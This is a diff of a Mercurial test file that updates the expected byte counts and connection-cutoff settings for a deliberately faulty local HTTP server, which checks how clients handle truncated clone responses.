$DAEMON_PIDS TODO client spews a stack due to uncaught ValueError in batch.results() @@ -422,17 +423,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (633) \r\n (no-py3 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (614) \r\n (no-py3 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -463,7 +464,7 @@ Server sends incomplete headers for getbundle response - $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is terrible @@ -486,17 +487,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (780) \r\n (no-py3 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (761) \r\n (no-py3 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -520,7 +521,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -544,7 +545,7 @@ Server stops before it sends transfer encoding - $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -573,7 +574,7 @@ Server sends empty HTTP body for getbundle - $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -591,17 +592,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (818) \r\n (no-py3 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (799) \r\n (no-py3 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -625,7 +626,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -651,7 +652,7 @@ Server sends partial compression string - $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -669,17 +670,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (842) \r\n (no-py3 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (823) \r\n (no-py3 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -702,7 +703,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) @@ -733,7 +734,7 @@ Server sends partial bundle2 header magic - $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -778,7 +779,7 @@ Server sends incomplete bundle2 stream params length - $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -825,7 +826,7 @@ Servers stops after bundle2 stream params header - $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -871,7 +872,7 @@ Server stops sending after bundle2 part header length - $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -920,7 +921,7 @@ Server stops sending after bundle2 part header - $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -973,7 +974,7 @@ Server stops after bundle2 part payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1029,7 +1030,7 @@ Server stops sending in middle of bundle2 payload chunk - $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1086,7 +1087,7 @@ Server stops sending after 0 length payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1148,8 +1149,7 @@ Server stops sending after 0 part bundle part header (indicating end of bundle2 payload) This is before the 0 size chunked transfer part that signals end of HTTP response. -# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log - $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1165,25 +1165,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25 - sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 